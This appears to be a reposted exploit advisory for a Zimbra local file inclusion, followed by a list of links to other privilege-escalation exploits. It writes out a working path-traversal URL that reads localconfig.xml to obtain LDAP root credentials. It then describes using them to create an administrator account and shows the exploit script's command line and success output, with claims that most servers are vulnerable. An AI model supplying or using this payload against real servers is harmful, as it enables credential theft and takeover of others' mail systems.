Zimbra 0day exploit / Privilegie escalation via LFI

简介: # Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI# Date: 06 Dec 2013# E...
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
  
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
  
---------------Description-----------------
  
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
  
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
  
Example :
  
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
  
or
  
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
  
  
----------------Exploit-----------------
  
  
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
  
use the exploit like this :
  
  
ruby run.rb -t mail.example.com -u someuser -p Test123_23
  
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
     [*] Login URL : https://mail.example.com:7071/zimbraAdmin/
     [*] Account   : someuser@example.com
     [*] Password  : Test123_23
[+] Successfully Exploited !
  
The number of servers vuln are huge like 80/100.
  
This is only for educational purpouses.
目录
相关文章
OBIEE Pentest
https://www.integrigy.com/files/Integrigy_OBIEE_Security_Top_Ten.
1252 0
|
Web App开发 PHP 索引
|
Web App开发 PHP 索引
|
Shell Apache Linux
Kloxo 6.1.6 - Local Privilege Escalation
#!/bin/sh # Exploit Title: Kloxo Local Privilege Escalation # Google Dork: inurl:kiddie...
979 0
|
PHP
Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability
http://www.wooyun.org/bugs/wooyun-2010-05526 Joomla! 1.
1107 0
|
Shell
Privilege escalation vulnerabilities in Nagios XI installer
  ================ Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.
1032 0
Armitage pentest
http://www.fastandeasyhacking.com/manual
674 0